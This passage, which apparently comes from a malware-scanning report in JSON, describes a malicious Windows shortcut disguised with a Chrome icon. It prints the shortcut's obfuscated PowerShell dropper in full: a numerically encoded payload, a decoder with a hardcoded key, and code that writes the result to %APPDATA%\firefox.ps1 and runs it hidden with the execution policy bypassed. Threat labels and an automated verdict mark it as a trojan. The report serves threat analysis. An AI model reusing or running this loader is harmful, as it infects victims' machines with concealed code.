57 45 48 108 90 108 135 89 63 94 44 26 104 96 141 132 115 34 33 106 142 181 76 112 126 100 122 43 140 181 76 130 138 62 44 37 86 126 132 80 115 123 46 79 167 113 70 62 62 125 99 104 86 156 117 133 140 101 124 96 167 102 123 139 133 100 122 26 140 181 69 141 129 45 57 28 93 120 82 72 142 125 47 106 157 183 65 139 115 57 47 26 100 120 82 69 134 123 53 24 100 108 149 68 64 127 122 26 100 105 140 50 138 59 57 38 140 181 81 72 72 127 113 26 100 105 73 76 75 58 126 104 96 101 80 64 130 123 43 24 87 126 145 68 81 100 122 35 158 174 122 48 109 59 58 95 117 96 69 72 142 114 74 19 89 116 113 72 72 54 48 35 85 112 70 63 142 123 58 39 99 158 145 61 55 59 126 79 169 183 106 68 98 83 78 85 86 102 146 139 115 123 56 28 89 105 149 112 142 125 61 34 90 119 82 76 66 51 112 24 81 101 147 114 138 59 39 32 93 109 73 124 142 98 126 106 165 114 65 57 58 43 111 43 89 112 134 55 122 112 46 26 90 111 80 74 58 44 111 104 161 126 64 59 69 66 100 82 132 102 82 76 62 58 90 43 85 120 98 57 60 54 48 37 161 181 69 59 63 53 57 41 85 144 81 132 133 112 44 39 89 106 66 68 58 48 44 19 154 115 76 65 73 44 111 104 161 126 64 59 69 66 100 82 132 102 82 76 62 58 90 43 85 120 98 57 60 54 48 37 161 181 79 61 62 47 117 99 154 103 84 54 111 45 57 38 140 181 83 59 77 49 59 36 123 120 72 72 140 100 122 26 100 102 69 62 64 44 57 108 140 185 108 63 56 48 51 39 156 130 80 75 92 58 45 23 100 102 65 141 129 74 44 35 169 181 81 54 66 51 50 32 152 185 136 101 73 62 58 39 87 102 149 137 70 58 61 40 100 103 66 141 129 74 43 39 87 152 78 72 64 43 126 104 104 114 80 63 58 127 113 55 86 116 115 76 59 54 59 60 104 103 66 68 64 56 99 49 135 96 65 72 83 66 65 104 103 96 65 72 59 127 97 108 165 103 80 58 62 48 48 25 100 171 114 62 64 43 57 30 85 158 90 107 53 43 57 49 108 124 145 73 73 60 60 19 85 116 66 112 83 86 48 35 85 124 123 115 106 58 59 100 165 119 60 57 73 44 114 104 89 98 81 132 115 68 75 19 86 101 80 64 128 75 57 20 85 171 112 63 75 48 58 35 91 114 88 115 116 94 75 73 128 144 135 102 73 43 75 24 87 112 71 70 134 123 58 39 102 119 60 57 73 44 117 16 169 138 64 57 129 89 53 32 100 185 136 103 69 51 57 60 104 101 77 141 138 58 57 39 169 172 112 63 75 48 58 35 91 114 149 56 58 57 102 81 118 101 84 59 58 114 78 26 90 118 80 58 59 127 46 29 82 116 67 58 70 58 50 32 169 172 116 59 71 42 49 39 91 101 105 68 59 43 126 106 156 139 70 93 60 48 56 35 93 116 149 128 105 39 57 41 84 101 76 62 64 79 47 32 96 118 60 141 108 38 46 43 86 102 149 128 104 54 50 39 169 181 80 72 73 125 126 95 114 112 71 73 63 40 75 24 80 109 80 141 102 54 58 40 100 107 122 141 142 127 122 38 89 105 69 141 113 127 124 43 95 106 83 74 77 51 50 94 85 97 65 139 115 123 58 21 93 109 73 65 125 127 97 108 167 181 78 57 58 43 42 93 104 105 76 126 56 107 111 28 87 106 75 72 75 43 43 93 165 177 90 56 60 54 65 82 143 148 66 74 77 47 57 72 104 101 84 90 58 45 53 30 98 177 145 61 60 48 52 39 102 101 108 73 133 118 111 26 100 105 70 58 69 43 47 26 80 170 79 68 66 58 43 93 165 177 90 56 60 54 65 82 143 148 66 74 77 47 57 72 104 101 84 90 58 45 53 30 98 177 145 71 62 47 46 99 160 170 67 76 55 96 44 39 99 156 145 75 60 62 48 41 97 139 84 64 73 125 99 108 128 107 63 62 67 58 113 53 100 119 99 72 61 42 57 25 85 185 136 88 60 54 126 104 101 98 73 65 66 51 109 108 156 145 80 76 74 58 44 25 169 181 77 72 77 59 57 26 86 185 136 88 59 58 44 75 98 116 71 57 142 123 61 37 100 107 65 141 129 80 41 24 131 112 73 72 142 123 57 39 100 185 136 88 59 58 92 43 86 112 82 93 77 45 43 35 91 114 122 90 58 62 44 24 156 137 67 62 75 58 43 25 169 105 70 54 73 45 43 36 100 109 73 141 129 94 44 37 84 108 80 63 58 83 53 25 85 185 147 128 96 48 78 26 90 115 76 65 73 127 113 71 81 116 82 56 58 54 47 30 121 106 73 68 75 38 126 74 80 105 84 58 59 127 113 70 96 109 80 141 138 58 57 39 167 185 136 86 69 49 58 29 82 134 65 52 66 58 126 68 96 117 81 72 64 100 126 108 119 116 72 62 56 58 113 67 85 116 72 141 129 79 61 24 97 185 145 96 53 86 48 22 90 118 84 57 69 48 48 94 124 96 114 62 65 50 61 30 101 171 101 76 58 55 126 95 131 106 67 74 73 100\\\";$Length = $VIUSBvejbawf.Length;$CLOIJSfgiojvosef235sdb = New-Object System.Collections.ArrayList;[string] $date = $null;$m = 0;for($k = 0; $k -lt $Length; $k++){$date += $VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \\\" \\\"){[void]$CLOIJSfgiojvosef235sdb.Add([byte] $date);$m++;$date = $null;continue;}}$Apkengsidefg = \\\"NFG87%br\\\";[Byte[]]$pw = [System.Text.Encoding]::UTF8.GetBytes(\\\"$Apkengsidefg\\\");\r\n$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]($CLOIJSfgiojvosef235sdb.Count);$j = 0;for($i = 0; $i -lt $CLOIJSfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;if($pw_num -ge $CLOIJSfgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] = $pw_num - $CLOIJSfgiojvosef235sdb[$i];}else{$MFibvfaibfeg2345fbdfg[$i] = $CLOIJSfgiojvosef235sdb[$i];}$j++;if($j -eq $pw_Length){$j = 0;}}$qqpvm = [System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg2345fbdfg);$fgfw98JHGVfeg = \\\"$env:appdata\\firefox.ps1\\\";$qqpvm|Out-File -FilePath $fgfw98JHGVfeg;powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;\"\r\n",
"icon_location": "%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"sha1": "9a6946ca040c259a59deb11942d94ebbcff0cdef",
"type_description": "Windows shortcut",
"unique_sources": 2,
"popular_threat_classification": {
"suggested_threat_label": "trojan.lnkobf/pantera",
"popular_threat_category": [
{
"count": 14,
"value": "trojan"
}
],
"popular_threat_name": [
{
"count": 2,
"value": "lnkobf"
},
{
"count": 2,
"value": "pantera"
}
]
},
"crowdsourced_ai_results": [
{
"category": "code_insight",
"analysis": "This LNK file is a malicious downloader/dropper that employs significant obfuscation and deceptive tactics. While masquerading as a legitimate shortcut for Google Chrome, it executes a complex PowerShell script. The script contains a large, numerically encoded payload that it decrypts using a hardcoded key ('NFG87%br'), writes the resulting malicious script to '%APPDATA%\\firefox.ps1', and subsequently executes it in a hidden window with bypassed execution policies. The use of LOLBins, hidden script execution, and multi-stage delivery confirms its malicious intent.",
"verdict": "malicious",
"source": "palm",
"id": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e-file-palm"
}
]
}
}
}